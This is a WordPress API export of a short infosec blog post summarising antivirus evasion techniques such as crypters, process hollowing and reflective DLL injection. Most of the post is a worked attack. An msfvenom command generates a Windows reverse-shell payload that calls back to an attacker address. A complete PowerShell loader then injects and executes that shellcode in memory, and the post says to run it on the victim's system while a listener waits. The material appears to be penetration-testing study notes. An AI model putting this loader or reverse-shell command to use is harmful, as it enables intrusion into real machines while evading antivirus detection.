{"id":4007,"date":"2024-08-17T14:23:39","date_gmt":"2024-08-17T12:23:39","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=4007"},"modified":"2025-03-21T11:42:01","modified_gmt":"2025-03-21T10:42:01","slug":"antivirus-evasion-techniques","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=4007","title":{"rendered":"Antivirus evasion techniques"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Short sum\u00adma\u00adry of techniques:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On-disk eva\u00adsion\n<ul class=\"wp-block-list\">\n<li>Pack\u00adag\u00ading soft\u00adware (zip, \u2026)<\/li>\n\n\n\n<li>Obfus\u00adca\u00adtors<\/li>\n\n\n\n<li>Crypters<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>In-mem\u00ado\u00adry evasion&nbsp;<ul class=\"wp-block-list\">\n<li>In-mem\u00ado\u00adry injec\u00adtion \/ <span class=\"caps\">PE<\/span> injec\u00adtion (Manip\u00adu\u00adlates the processe\u2019s memory)&nbsp;<ul class=\"wp-block-list\">\n<li>Remote Process Mem\u00ado\u00adry Injec\u00adtion (Manip\u00adu\u00adlates <em>anoth\u00aders<\/em> processe\u2019s memory)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Reflec\u00adtive <span class=\"caps\">DLL<\/span> injec\u00adtion (while nor\u00admal <span class=\"caps\">DLL<\/span> injec\u00adtion loads a <span class=\"caps\">DLL<\/span> from the disk, reflec\u00adtive <span class=\"caps\">DLL<\/span> injec\u00adtion loads a <span class=\"caps\">DLL<\/span> direct\u00adly from a processe\u2019s memory.)<\/li>\n\n\n\n<li>Process Hol\u00adlow\u00ading (a non-mal\u00adi\u00adcous process is start\u00aded, sus\u00adpend\u00aded, then it\u2019s mem\u00ado\u00adry is over\u00adwrit\u00adten with mal\u00adi\u00adcous code, then resumed)<\/li>\n\n\n\n<li>Inline hook\u00ading (some mem\u00ado\u00adry is over\u00adwrit\u00adten to jump to mal\u00adi\u00adcous code elsewhere)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Example of a manual In-memory injection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate a reverse shell pay\u00adload for PowerShell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Use this Pow\u00ader\u00adShell script, which injects the shell\u00adcode into the own (Pow\u00ader\u00adShell) process and exe\u00adcutes it in a new thread:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"powershell\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>$code = '\n[DllImport(\"kernel32.dll\")]\npublic static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\n[DllImport(\"kernel32.dll\")]\npublic static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\n[DllImport(\"msvcrt.dll\")]\npublic static extern IntPtr memset(IntPtr dest, uint src, uint count);';\n\n$var2 = \n  Add-Type -memberDefinition $code -Name \"iWin32\" -namespace Win32Functions -passthru;\n\n[Byte[]];\n[Byte[]]$var1 = SHELLCODE_HERE;\n\n$size = 0x1000;\n\nif ($var1.Length -gt 0x1000) {$size = $var1.Length};\n\n$x = $var2::VirtualAlloc(0,$size,0x3000,0x40);\n\nfor ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)};\n\n$var2::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Start a lis\u00adten\u00ader and exe\u00adcute it in the vic\u00adtim\u2019s sys\u00adtem via <code>.\\a.ps1 <\/code>(Note: Make sure to exe\u00adcute the right Pow\u00ader\u00adShell and shell\u00adcode for the architecture!)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Example of a automatic In-memory injection with Shelter<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.kali.org\/tools\/shellter\/\">Shel\u00adter<\/a> can inject shell\u00adcode into a binary.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">See also inci\u00addent response train\u00ading march 2025 , slide advanced5.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Short sum\u00adma\u00adry of tech\u00adniques: Exam\u00adple of a man\u00adu\u00adal In-mem\u00ado\u00adry injec\u00adtion Cre\u00adate a reverse shell pay\u00adload for Pow\u00ader\u00adShell: msfven\u00adom \u2011p windows\/shell_reverse_tcp <span class=\"caps\">LHOST<\/span>=192.168.45.211 <span class=\"caps\">LPORT<\/span>=443 \u2011f pow\u00ader\u00adshell \u2011v sc Use this Pow\u00ader\u00adShell script, which injects the shell\u00adcode into the own (Pow\u00ader\u00adShell) process and exe\u00adcutes it in a new thread: Start a lis\u00adten\u00ader and exe\u00adcute it in the vic\u00adtim\u2019s [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[473],"tags":[299,300,274],"class_list":["post-4007","post","type-post","status-publish","format-standard","hentry","category-persistence","tag-antivirus","tag-evasion","tag-injection"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4007"}],"version-history":[{"count":5,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4007\/revisions"}],"predecessor-version":[{"id":4811,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4007\/revisions\/4811"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4007"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4007"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}